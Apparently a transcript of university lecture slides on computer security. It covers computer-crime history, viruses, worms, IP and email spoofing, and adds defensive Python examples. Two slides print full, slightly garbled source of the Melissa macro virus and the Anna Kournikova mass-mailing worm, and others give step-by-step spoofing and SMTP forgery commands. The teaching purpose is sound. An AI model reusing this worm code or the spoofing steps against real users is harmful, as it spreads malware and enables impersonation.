Transcript
Slide 1
Computer Security GSBA (Zurich): MIS Block Hacking
Slide 2
Sanjay Goel, School of Business, University at Albany
Topics
- Crisis
- Computer Crimes
- Hacker Attacks
- Modes of Computer Security
- Password Security
- Network Security
- Web Security
- Distributed Systems Security
- Database Security
Slide 3
Crisis
- The Internet has grown very fast and security has lagged behind.
- Legions of hackers have emerged, as the barrier to entering the hackers' club is low.
- It is hard to trace the perpetrator of cyber attacks since the real identities are camouflaged.
- It is very hard to track down people because of the ubiquity of the network.
- Large-scale failures of the Internet can have a catastrophic impact on the economy, which relies heavily on electronic transactions.
Slide 4
Computer Crime: The Beginning
- In 1988 a "worm program" written by a college student shut down about 10 percent of computers connected to the Internet. This was the beginning of the era of cyber attacks.
- Today we have about 10,000 reported incidents of cyber attacks, and the number is growing.
Slide 5
Computer Crime - 1994
- A 16-year-old music student called Richard Pryce, better known by the hacker alias Datastream Cowboy, is arrested and charged with breaking into hundreds of computers including those at the Griffiss Air Force Base, NASA and the Korean Atomic Research Institute. His online mentor, "Kuji", is never found.
- Also this year, a group directed by Russian hackers broke into the computers of Citibank and transferred more than $10 million from customers' accounts. Eventually, Citibank recovered all but $400,000 of the pilfered money.
Slide 6
Computer Crime - 1995
- In February, Kevin Mitnick is arrested for a second time. He is charged with stealing 20,000 credit card numbers. He eventually spends four years in jail, and on his release his parole conditions demand that he avoid contact with computers and mobile phones.
- On November 15, Christopher Pile becomes the first person to be jailed for writing and distributing a computer virus. Mr Pile, who called himself the Black Baron, was sentenced to 18 months in jail.
- The US General Accounting Office reveals that US Defense Department computers sustained 250,000 attacks in 1995.
Slide 7
Computer Crime - 1999
- In March, the Melissa virus goes on the rampage and wreaks havoc with computers worldwide. After a short investigation, the FBI tracks down and arrests the writer of the virus, a 29-year-old New Jersey computer programmer, David L. Smith.
- More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999.
Slide 8
Computer Crime - 2000
- In February, some of the most popular websites in the world, such as Amazon and Yahoo, are almost overwhelmed by being flooded with bogus requests for data.
- In May, the ILOVEYOU virus is unleashed and clogs computers worldwide. Over the coming months, variants of the virus are released that manage to catch out companies that didn't do enough to protect themselves.
- In October, Microsoft admits that its corporate network has been hacked and source code for future Windows products has been seen.
Slide 9
Computer Crime - 2002
- In April 2002, computer hackers calling themselves Deceptive Duo announced that they had begun their mission of breaking into computer systems to call attention to the vulnerabilities in US national security.
- In subsequent weeks they hacked into 52 web sites and databases, including those operated by the US Office of the Secretary of Defense, the Space and Naval Warfare Systems Command, the Defense Logistics Agency, Sandia National Lab, NASA JPL, airlines and banks.
Slide 10
Intrusion Incident Reports
[Chart of reported intrusion incidents per year. Note: projected from 3 quarters of data]
Slide 11
Why are we vulnerable?
- Increased complexity of the systems
- Large networks with switches, hubs and gateways provide multiple entry points
- Very sophisticated software using millions of lines of code, which leaves holes for hackers to attack
- Constantly upgrading computer systems and software; support staff are not able to keep up with security provisions
- New technology (often not fully tested) adds new risk
- Lack of proper education: managers do not realize the vulnerabilities and are not willing to invest in technology that does not directly affect the bottom line
- Dependence on commercial software with known vulnerabilities, e.g. Microsoft Windows OS and Outlook
Slide 12
VIRUSES
Slide 13
Virus
- Computer viruses are self-replicating software entities that attach themselves parasitically to existing programs.
- The virus spreads by creating a replica of itself and attaching it to other executable programs to which it has write access.
- A true virus does not spread from machine to machine on its own. It must be passed on to other users via e-mail, infected files/diskettes, programs or shared files.
- Viruses normally consist of two parts:
  Replicator: responsible for copying the virus to other executable programs.
  Payload: the action of the virus, which may be benign, such as printing a weird message or playing music, or malicious, such as destroying data or corrupting the hard disk.
Slide 14
Virus
- When a user executes an infected program (an executable file or boot sector), the viral portion of the code typically executes first and then control returns to the original program, which executes normally.
- Unless the virus executes a payload which the user observes, the user is not likely to notice the virus operating on his/her hard drive.
- Viruses can persist in your programs for a long time without being detected, thus constantly upgrading your virus signatures and running virus scans is very important.
Slide 15
Virus
- Polymorphic viruses: viruses which modify themselves prior to attaching themselves to another program. These are hard to detect since they are constantly changing their signature.
- Macro viruses: these viruses use an application macro language (such as VB or VBScript) to create programs that infect documents and templates. If an infected document is opened the virus is executed and it infects the user's application templates.
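Slides 14 and 15 describe signature scanning and why polymorphism defeats it. The following is an added example, not code from the lecture: a minimal byte-signature scanner with wildcard support, run over constructed sample files. The signatures, sample bytes and names (`SIGNATURES`, `scan`, `fingerprint`) are all assumptions made for this demonstration; "Demo.Marker.A" is simply the ASCII string "... by Kwyjibo" that the Melissa source shown later on this page writes into the registry, used here as an illustrative pattern.

```python
import hashlib
from typing import List, Optional, Tuple

# A signature is a list of byte values; None marks a wildcard position (written "??"
# in the textual form), so one pattern can cover variants that differ in a few bytes.
Signature = List[Optional[int]]


def parse_signature(text: str) -> Signature:
    """Turn "DE AD ?? BE EF" into [0xDE, 0xAD, None, 0xBE, 0xEF]."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


# Constructed demonstration signatures; these are not real anti-virus definitions.
SIGNATURES = {
    "Demo.Marker.A": parse_signature("2E 2E 2E 20 62 79 20 4B 77 79 6A 69 62 6F"),  # "... by Kwyjibo"
    "Demo.Wild.B": parse_signature("DE AD ?? BE EF"),
}


def matches_at(data: bytes, offset: int, sig: Signature) -> bool:
    """True if sig matches data starting at offset (wildcards match any byte)."""
    if offset + len(sig) > len(data):
        return False
    return all(b is None or data[offset + i] == b for i, b in enumerate(sig))


def scan(data: bytes, signatures=SIGNATURES) -> List[Tuple[str, int]]:
    """Return (signature name, offset) for every signature present in data.

    Each signature is reported once, at its first occurrence.  A plain sliding window
    is enough for a demonstration; a real engine uses a multi-pattern matcher.
    """
    hits = []
    for name, sig in signatures.items():
        for offset in range(len(data) - len(sig) + 1):
            if matches_at(data, offset, sig):
                hits.append((name, offset))
                break
    return hits


def fingerprint(data: bytes) -> str:
    """SHA-256 of the whole file: the exact-match complement to pattern scanning."""
    return hashlib.sha256(data).hexdigest()


# Constructed sample "files": a clean one and one carrying the marker string at offset 12.
CLEAN_FILE = b"MZ\x90\x00" + b"nothing to see here"
INFECTED_FILE = b"MZ\x90\x00" + b"padding " + b"... by Kwyjibo" + b"\x00"
# A single changed byte inside the marker is enough to defeat the fixed pattern, which is
# the point of slide 15 and the reason signature databases need constant updating.
MUTATED_FILE = INFECTED_FILE.replace(b"Kwyjibo", b"Kwyjibx")

if __name__ == "__main__":
    for label, blob in [("clean", CLEAN_FILE), ("infected", INFECTED_FILE), ("mutated", MUTATED_FILE)]:
        print(label, fingerprint(blob)[:16], scan(blob))
```

The hash fingerprint catches only exact copies, the pattern catches anything containing the marker, and neither catches the one-byte variant: that gap is what behavioural and heuristic scanning exist to fill.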
Slide 16
Sanjay Goel, School of Business, University at Albany 16 //
Melissa Virus Source Code Private Sub Document_Open() On Error
Resume Next If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1& Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1
- 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook,
DasMapiName, BreakUmOffASlice Set UngaDasOutlook =
CreateObject("Outlook.Application") Set DasMapiName =
UngaDasOutlook.GetNameSpace("MAPI") If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") "... by
Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon
"profile", "password" For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set
BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To
AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo
= AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject =
"Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for...
don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add
ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y
DasMapiName.Logoff End If Melissa Virus
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "...
by Kwyjibo" End If Set ADI1 =
ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 =
NormalTemplate.VBProject.VBComponents.Item(1) NTCL =
NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines
BGN = 2 If ADI1.Name "Melissa" Then If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name =
"Melissa" DoAD = True End If If NTI1.Name "Melissa" Then If NTCL
> 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect =
NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT True And DoAD
True Then GoTo CYA If DoNT = True Then Do While
ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1 Loop End If If DoAD = True Then Do While
NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1 Loop End If CYA: If NTCL 0 And ADCL = 0 And (InStr(1,
ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf
(InStr(1, ActiveDocument.Name, "Document") False) Then
ActiveDocument.Saved = True: End If 'WORD/Melissa written by
Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus?
Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email |
Word 97 Word 2000... it's a new age! If Day(Now) = Minute(Now) Then
Selection.TypeText " Twenty-two points, plus triple-word-score,
plus fifty points for using all my letters. Game's over. I'm outta
here." End Sub
Slide 17
Worms
- Worms are a form of self-replicating program that can automatically spread. Unlike viruses they do not need a carrier program; they replicate by spawning copies of themselves.
- They are more complex and much harder to write than virus programs.
- The ILOVEYOU worm in 2000 automatically emailed itself to the first 200 entries in the Outlook address book. The worm spread to 10 million computers in the two days that were required to create a patch for it. It cost billions of dollars to repair the damage.
- Sometimes worms take a long time to spread: the Anna Kournikova worm was discovered in August 2000 and became a serious threat in February 2001.
- CodeRed, Nimda and SirCam are other worms, each of which cost upwards of 500 million dollars in damages.
Slide 18
Sanjay Goel, School of Business, University at Albany 18
'Vbs.OnTheFly Created By OnTheFly On Error Resume Next Set
WScriptShell = CreateObject("WScript.Shell") WScriptShell.regwrite
"HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b" Set
FileSystemObject = Createobject("scripting.filesystemobject")
FileSystemObject.copyfile
wscript.scriptfullname,FileSystemObject.GetSpecialFolder(0) &
"\AnnaKournikova.jpg.vbs" if WScriptShell.regread
("HKCU\software\OnTheFly\mailed") "1" then doMail() end if if
month(now) = 1 and day(now) = 26 then WScriptShell.run
"Http://www.dynabyte.nl",3,false end if Set thisScript =
FileSystemObject.opentextfile(wscript.scriptfullname, 1)
thisScriptText = thisScript.readall thisScript.Close Do If Not
(FileSystemObject.fileexists(wscript.scriptfullname)) Then Set
newFile = FileSystemObject.createtextfile(wscript.scriptfullname,
True) newFile.write thisScriptText newFile.Close End If Loop
Function doMail() On Error Resume Next Set OutlookApp =
CreateObject("Outlook.Application") If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI") Set
AddressLists = MAPINameSpace.AddressLists For Each address In
AddressLists If address.AddressEntries.Count 0 Then entryCount =
address.AddressEntries.Count For i = 1 To entryCount Set newItem =
OutlookApp.CreateItem(0) Set currentAddress =
address.AddressEntries(i) newItem.To = currentAddress.Address
newItem.Subject = "Here you have, ;o)" newItem.Body = "Hi:" &
vbcrlf & "Check This!" & vbcrlf & "" set attachments =
newItem.Attachments attachments.Add
FileSystemObject.GetSpecialFolder(0) &
"\AnnaKournikova.jpg.vbs" newItem.DeleteAfterSubmit = True If
newItem.To "" Then newItem.Send WScriptShell.regwrite
"HKCU\software\OnTheFly\mailed", "1" End If Next End If Next end if
End Function 'Vbswg 1.50b Worm (Anna Kournikova)
Slide 19
Trojan Horse
- This is a program that secretly gets installed on a computer, planting a secret payload that can allow the hacker who planted it access to do things such as stealing passwords or recording keystrokes and transmitting them to a third party.
- A logic bomb is a trojan horse that executes when certain conditions become true; most commonly it executes at a specific date and time.
- Example: the Cute Trojan Horse allows hackers to destroy the firewalls installed on computers.
Slide 20
HACKERS
Slide 21
Why do Hackers Attack?
- Most hackers try to test the system limitations out of intellectual curiosity and bragging rights.
- Cyber criminals hack into corporate computers to steal money or credit card numbers. In March 2001 the FBI reported that over 1 million credit card numbers were stolen by cyber criminals in Russia and Ukraine.
- Cyber terrorists try to push their political agenda by coercion via computer-based attacks against computers and networks. NATO computers were blasted with infected emails to protest against bombings in Kosovo during the 1999 conflict. Lucent was made the target of DoS attacks by a group protesting against its business with Israel.
- Disgruntled employees often vent anger at a company or organization by hacking and stealing information or causing damage to computer systems.
Slide 22
Types of Hacker Attack
- Active Attacks
  Denial of Service
  Breaking into a site
    Intelligence Gathering
    Resource Usage
    Deception
- Passive Attacks
  Sniffing
    Passwords
    Network Traffic
    Sensitive Information
  Information Gathering
Slide 23
Modes of Hacker Attack
- Spoofing
- Session Hijacking
- Denial of Service Attacks
- Buffer Overflow Attacks
- Password Attacks
Slide 24
Spoofing
- Definition: An attacker alters his identity so that someone thinks he is someone else (email, user ID, IP address).
- The attacker exploits the trust relation between a user and networked machines to gain access to machines.
- Types of spoofing:
  1. IP Spoofing
  2. Email Spoofing
  3. Web Spoofing
Slide 25
IP Spoofing
There are three basic flavors of IP spoofing attacks:
- Basic address change
- Use of source routing to intercept packets
- Exploiting a trust relationship on UNIX machines
Slide 26
IP Spoofing: Basic Address Change
- Definition: The attacker uses the IP address of another computer to acquire information or gain access.
[Diagram: Attacker 10.10.50.50 sends a packet with From Address 10.10.20.30 (the spoofed address) and To Address 10.10.5.5 (John). Replies are sent back to 10.10.20.30.]
- The attacker changes his own IP address to the spoofed address.
- The attacker can send messages to a machine masquerading as the spoofed machine.
- The attacker cannot receive messages from that machine.
Slide 27
Basic Address Change (Windows)
Simple mechanism:
- From the Start menu select Settings, then Control Panel
- Double click on the Network icon
- Right click the LAN connection and select Properties
- Select Internet Protocol (TCP/IP) and click on Properties
- Change the IP address to the address you want to spoof
- Reboot the machine
- All packets sent from the machine now have the spoofed address
Slide 28
Basic Address Change (Unix)
- Use the ifconfig command
- [Write details]
Slide 29
IP Spoofing (Basic Address Change)
- Limitation: a "flying blind" attack, i.e. the user cannot get return messages.
  Any protocol which requires a 3-way connection cannot be used.
  UDP, which is connectionless, can be used to send packets.
- Uses: used in denial-of-service attacks where a single packet can crash a machine.
Slide 30
IP Spoofing: Basic Address Change
Prevention
- You can protect your machines from being used to launch a spoofing attack; you can do little to prevent other people from spoofing your address.
- Users can be prevented from having access to the network configuration.
- To protect your company from spoofing attacks you can apply basic filters at your routers:
  Ingress filtering: prevent packets from outside coming in with an address from inside.
  Egress filtering: prevent packets not having an internal address from leaving the network.
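The ingress and egress rules above, as an added example that is not part of the lecture: a small packet filter that applies both checks to constructed traffic using the slide's 10.10.x.x addresses. The internal block `10.10.0.0/16`, the `Packet` type and the sample packets are assumptions; the extra "never from outside" list (loopback, RFC 1918, link-local) goes a little beyond the slide, which names only the internal block.

```python
import ipaddress
from typing import NamedTuple, Tuple

# Constructed example: the company's internal address block, chosen to match the
# 10.10.x.x addresses in the slides' diagrams.
INTERNAL_NET = ipaddress.ip_network("10.10.0.0/16")

# Sources that should never arrive from the Internet regardless of the internal range
# (an extension beyond the slide's rule).
NEVER_FROM_OUTSIDE = [
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("169.254.0.0/16"),
]


class Packet(NamedTuple):
    src: str
    dst: str
    direction: str  # "in": arriving on the Internet-facing interface; "out": leaving through it


def ingress_check(pkt: Packet) -> Tuple[str, str]:
    """Ingress filtering: drop packets from outside that claim an inside (or unroutable) source."""
    src = ipaddress.ip_address(pkt.src)
    if src in INTERNAL_NET:
        return ("drop", f"inbound packet claims internal source {pkt.src}")
    for net in NEVER_FROM_OUTSIDE:
        if src in net:
            return ("drop", f"inbound packet from unroutable source {pkt.src} ({net})")
    return ("accept", "")


def egress_check(pkt: Packet) -> Tuple[str, str]:
    """Egress filtering: drop packets leaving the network whose source is not one of ours."""
    src = ipaddress.ip_address(pkt.src)
    if src not in INTERNAL_NET:
        return ("drop", f"outbound packet with non-internal source {pkt.src}")
    return ("accept", "")


def filter_packet(pkt: Packet) -> Tuple[str, str]:
    """Route a packet to the check that applies to its direction; returns (verdict, reason)."""
    if pkt.direction == "in":
        return ingress_check(pkt)
    if pkt.direction == "out":
        return egress_check(pkt)
    raise ValueError(f"unknown direction {pkt.direction!r}")


# Constructed traffic sample: 10.10.20.30 is the slide's spoofed address, 10.10.5.5 is John,
# and the outside addresses come from the documentation ranges.
SAMPLE = [
    Packet("10.10.20.30", "10.10.5.5", "in"),       # outsider pretending to be 10.10.20.30
    Packet("198.51.100.7", "10.10.5.5", "in"),      # ordinary inbound traffic
    Packet("192.168.1.9", "10.10.5.5", "in"),       # private source should never arrive from outside
    Packet("10.10.50.50", "198.51.100.7", "out"),   # ordinary outbound traffic
    Packet("203.0.113.44", "198.51.100.7", "out"),  # an inside host spoofing someone else's address
]

if __name__ == "__main__":
    for p in SAMPLE:
        print(p.direction, p.src, "->", p.dst, filter_packet(p))
```

Egress filtering is what stops your own network from being the launch point the slide warns about; ingress filtering is what stops the flying-blind packet from reaching John in the first place.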
Slide 31
IP Spoofing: Source Routing
- Definition: The attacker spoofs the address of another machine and inserts himself between the attacked machine and the spoofed machine to intercept replies.
[Diagram: Attacker 10.10.50.50 sends a packet with From Address 10.10.20.30 (the spoofed address) and To Address 10.10.5.5 (John). Replies are sent back to 10.10.20.30; the attacker intercepts the packets as they go to 10.10.20.30.]
- The path a packet takes can vary over time.
Slide 32
IP Spoofing: Source Routing (contd.)
- The attacker uses source routing to ensure that the packets pass through certain nodes on the network.
- Loose Source Routing (LSR): the sender specifies a list of addresses that the packet must go through, but it can go to any other address if it needs to.
- Strict Source Routing (SSR): the sender specifies the exact path for the packet, and the packet is dropped if the exact path cannot be taken.
- Source routing works by using a 39-byte source route option field in the IP header. It works by picking one node address at a time, sequentially. A maximum of 9 nodes in the path can be specified.
- Source routing was introduced into the TCP spec for debugging and testing redundancy in the network.
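To make the 39-byte option concrete, here is an added example (not from the lecture) that parses the option area of an IPv4 header, recognises the loose and strict source route options, and returns the hop list; `should_drop` is the router policy the next slides recommend. The helper functions `build_header` and `source_route_option` exist only to construct test packets, and the option type values (0x83 for LSRR, 0x89 for SSRR, pointer starting at 4, 9 hops maximum) are the standard IPv4 encoding rather than anything taken from the page.

```python
import ipaddress
import struct
from typing import List, Optional, Tuple

LSRR = 0x83  # Loose Source and Record Route option type
SSRR = 0x89  # Strict Source and Record Route option type
MAX_SOURCE_ROUTE_LEN = 39  # type + length + pointer + 9 addresses of 4 bytes, as the slide says


def parse_ipv4_options(header: bytes) -> List[Tuple[int, bytes]]:
    """Return (option type, option data) for each option in an IPv4 header.

    Options start at byte 20 and run up to IHL*4.  Types 0 (end of list) and 1 (no-op)
    are single bytes; every other type carries a length byte covering type, length and data.
    """
    ihl = (header[0] & 0x0F) * 4
    if ihl < 20 or len(header) < ihl:
        raise ValueError("truncated IPv4 header")
    options, i = [], 20
    while i < ihl:
        opt_type = header[i]
        if opt_type == 0:
            break
        if opt_type == 1:
            i += 1
            continue
        if i + 1 >= ihl:
            raise ValueError("option without length byte")
        length = header[i + 1]
        if length < 2 or i + length > ihl:
            raise ValueError("option length runs past the header")
        options.append((opt_type, header[i + 2:i + length]))
        i += length
    return options


def source_route(header: bytes) -> Optional[Tuple[str, int, List[str]]]:
    """Return ("LSRR" or "SSRR", pointer, hop list) if the packet is source routed, else None."""
    for opt_type, data in parse_ipv4_options(header):
        if opt_type not in (LSRR, SSRR):
            continue
        if len(data) + 2 > MAX_SOURCE_ROUTE_LEN or len(data) < 1 or (len(data) - 1) % 4:
            raise ValueError("malformed source route option")
        pointer = data[0]  # offset of the next hop, counted from the option start (first hop = 4)
        hops = [str(ipaddress.IPv4Address(data[k:k + 4])) for k in range(1, len(data), 4)]
        return ("LSRR" if opt_type == LSRR else "SSRR", pointer, hops)
    return None


def should_drop(header: bytes) -> bool:
    """Router policy from the slides: source-routed packets are not forwarded."""
    return source_route(header) is not None


# --- constructed helpers for building test packets (not part of the page) ---
def source_route_option(hops: List[str], kind: int = LSRR) -> bytes:
    data = bytes([4]) + b"".join(ipaddress.IPv4Address(h).packed for h in hops)
    return bytes([kind, 2 + len(data)]) + data


def build_header(src: str, dst: str, options: bytes = b"") -> bytes:
    options += b"\x00" * ((-len(options)) % 4)  # pad to a 32-bit boundary with end-of-list bytes
    ihl_words = (20 + len(options)) // 4
    if ihl_words > 15:
        raise ValueError("options too long for the 4-bit IHL field")
    fixed = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl_words, 0, 20 + len(options), 0, 0, 64, 6, 0,
                        ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return fixed + options


if __name__ == "__main__":
    pkt = build_header("10.10.20.30", "10.10.5.5", source_route_option(["10.10.50.50", "10.10.5.5"]))
    print(source_route(pkt), "drop:", should_drop(pkt))
```

Note the length check: nine hops fill the option exactly (3 + 9 × 4 = 39 bytes), and anything longer is rejected as malformed rather than parsed, which is the safe failure mode for a filter.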
Slide 33
IP Spoofing: Source Routing (contd.)
Tracert: a Windows NT utility that runs at a command prompt. It traces a path from your machine to the URL or IP address given along with the tracert command.
Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
  -d              Do not resolve addresses to hostnames.
  -h maximum_hops Maximum number of hops to search for target.
  -j host-list    Loose source route along host-list.
  -w timeout      Wait timeout milliseconds for each reply.
Tracing a URL: tracert www.techadvice.com
  Tracing route to www.techadvice.com [63.69.55.237] over a maximum of 30 hops:
  1 181 ms 160 ms 170 ms border0.Srvf.Rx2.abc [63.69.55.237]
  2 170 ms 170 ms 160 ms 192.168.0.2
  3 .....
Slide 34
IP Spoofing: Source Routing (contd.)
- Tracing an IP address: tracert 3.1.6.62
- Tracing using loose source routing: tracert -j 3.2.1.44 3.3.1.42
- Protection: disable source routing at your routers.
Slide 35
IP Spoofing: Trust Relationships
- In UNIX, trust relationships can be set up between multiple machines. After trust becomes established the user can use the Unix r-commands to access resources on different machines.
- A .rhosts file is set up on individual machines, or /etc/hosts.equiv is used to set it up at the system level.
- A trust relationship is easy to spoof: if the user realizes that a machine trusts the IP address 10.10.10.5, he can spoof that address and he is allowed access without a password. The responses go back to the spoofed machine, so this is still a flying-blind attack.
- Protection:
  Do not use trust relations.
  Do not allow trust relationships on the Internet; limit them to within the company.
  Monitor which machines and users can have trust without jeopardizing critical data or function.
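The "monitor which machines and users can have trust" advice above can be partly automated. The following is an added example (not from the lecture): an auditor that rates each entry of an /etc/hosts.equiv or ~/.rhosts file, flagging wildcards and hosts outside the company range. The internal block `10.10.0.0/16`, the severity scale and the sample file are assumptions made for this demonstration.

```python
import ipaddress
from typing import List, NamedTuple

# Constructed: the company's internal address block, matching the slides' 10.10.x.x addresses.
INTERNAL_NET = ipaddress.ip_network("10.10.0.0/16")


class Finding(NamedTuple):
    line_no: int
    entry: str
    severity: str
    reason: str


def audit_trust_file(text: str, internal=INTERNAL_NET) -> List[Finding]:
    """Rate each entry of an /etc/hosts.equiv or ~/.rhosts file.

    Entry syntax is "host [user]".  "+" in either position is a wildcard, a leading "-"
    on the host denies it, and "@name" refers to a netgroup (not expanded here).
    """
    findings: List[Finding] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        host = parts[0]
        user = parts[1] if len(parts) > 1 else None
        if host == "+" and user == "+":
            findings.append(Finding(n, line, "critical", "any user on any host gets in without a password"))
        elif host == "+":
            findings.append(Finding(n, line, "critical", "any host is trusted, so any spoofed address works"))
        elif user == "+":
            findings.append(Finding(n, line, "high", "every user on this host is trusted"))
        elif host.startswith(("-", "@")):
            continue  # explicit deny or netgroup: nothing to flag at this level
        else:
            try:
                addr = ipaddress.ip_address(host)
            except ValueError:
                findings.append(Finding(n, line, "medium", "hostname entry: cannot confirm it is inside the company"))
                continue
            if addr not in internal:
                findings.append(Finding(n, line, "high", "trusted host lies outside the internal network"))
            else:
                findings.append(Finding(n, line, "low", "trust rests on the source IP alone, which can be spoofed"))
    return findings


# Constructed sample file (not from the page).
SAMPLE_HOSTS_EQUIV = """# /etc/hosts.equiv - constructed example
10.10.10.5
10.10.10.6 backupuser
+ +
198.51.100.20
buildhost
-10.10.10.99
"""

if __name__ == "__main__":
    for f in audit_trust_file(SAMPLE_HOSTS_EQUIV):
        print(f"line {f.line_no:2d} [{f.severity:8s}] {f.entry!r}: {f.reason}")
```

Even the "low" findings are worth listing: the slide's point is that an IP-only trust decision is spoofable, so the best result of an audit is an empty file.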
Slide 36
Email Spoofing
- Definition: The attacker sends messages masquerading as someone else.
- What can be the repercussions?
- Reasons:
  Attackers want to hide their identity while sending messages (sending anonymous emails): the user sends email to an anonymous e-mailer, which sends the email to the intended recipient.
  The attacker wants to impersonate someone, to get someone in trouble.
  Social engineering: get information by pretending to be someone else.
Slide 37
Email Spoofing: Similar Name Account
- Create an account with a similar email address ([email protected]): a message from this account can perplex the students.
- Most mailers have an alias field (this can be used to prescribe any name).
- Example:
  Class: I am too sick to come to the class tomorrow so the class is cancelled. The assignments that were due are now due next week.
  Sanjay Goel
Slide 38
Email Spoofing: Similar Name Account
Protection
- Educate the employees in a corporation to be cautious.
- Make sure that the full email address rather than the alias is displayed.
- Institute a policy that all official communication be done using company email.
- Use PKI, where the digital signature of each employee is associated with the email.
Slide 39
Email Spoofing: Mail Client
- Modify a mail client: when email is sent from the user, no authentication is performed on the From address. The attacker can put in any return address he wants in the mail he sends.
- Protection: education, audit logging, looking at the full email address.
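Slides 37 to 39 all come down to the same protection: show the full address, not the alias, and notice when it is not what the display name suggests. The following is an added example (not from the lecture) of checks a mail client or gateway could run on a message's From and Reply-To headers. The company domain `example.edu`, the function names and both sample messages are constructed for this demonstration; the spoofed one reproduces the "class cancelled" scenario from slide 37.

```python
import email
from email.utils import parseaddr
from typing import List, Set

# Constructed: the organisation's own mail domain(s).
COMPANY_DOMAINS: Set[str] = {"example.edu"}


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def full_sender(raw_message: str) -> str:
    """Render the sender with the full address visible, as slide 38 recommends, never the alias alone."""
    name, addr = parseaddr(email.message_from_string(raw_message).get("From", ""))
    return f"{name} <{addr}>" if name else addr


def sender_findings(raw_message: str, company: Set[str] = COMPANY_DOMAINS) -> List[str]:
    """Warnings worth showing the user (or logging at the gateway) about a message's claimed sender."""
    msg = email.message_from_string(raw_message)
    name, addr = parseaddr(msg.get("From", ""))
    findings: List[str] = []
    if "@" not in addr:
        return ["From header has no parsable address"]
    from_domain = domain_of(addr)
    if from_domain not in company:
        findings.append(f"From address {addr} is outside the company domains")
        if name:
            # A familiar display name on an external address is the look-alike trick from slide 37.
            findings.append(f"display name '{name}' shown for an external address")
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    if reply_to and domain_of(reply_to) != from_domain:
        findings.append(f"Reply-To {reply_to} points to a different domain than From")
    return findings


# Constructed sample messages (not from the page).
SPOOFED = """From: Sanjay Goel <sgoel@example.net>
Reply-To: sgoel@mail-example.org
To: class@example.edu
Subject: Class cancelled

Class: I am too sick to come to the class tomorrow so the class is cancelled.
"""

GENUINE = """From: Sanjay Goel <sgoel@example.edu>
To: class@example.edu
Subject: Reminder

See you tomorrow.
"""

if __name__ == "__main__":
    for label, raw in [("spoofed", SPOOFED), ("genuine", GENUINE)]:
        print(label, full_sender(raw), sender_findings(raw))
```

These checks only inspect what the message claims about itself; they make the slide's "look at the full address" advice automatic, and the PKI signatures mentioned on slide 38 are what would actually prove the claim.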
Slide 40
Email Spoofing: Telnet to Port 25
- Most mail servers use port 25 for SMTP. An attacker runs a port scan and gets the IP address of a machine with port 25 open.
- telnet ip-address 25 (command to telnet to port 25)
- The attacker logs on to this port and composes a message for the user. Example:
  HELO
  MAIL FROM: spoofed-email-address
  RCPT TO: person-sending-mail-to
  DATA
  (message you want to send)
  . (a period sign on a line by itself ends the message)
Slide 41
Email Spoofing: Telnet to Port 25
- Mail relaying is the sending of email to a person on a different domain.
- Protection:
  Make sure that the recipient's domain is the same as the mail server's.
  New SMTP servers disallow mail relaying: from a remote connection the From and To addresses must be in the same domain as the mail server.
  Make sure that spoofing and relay filters are configured.
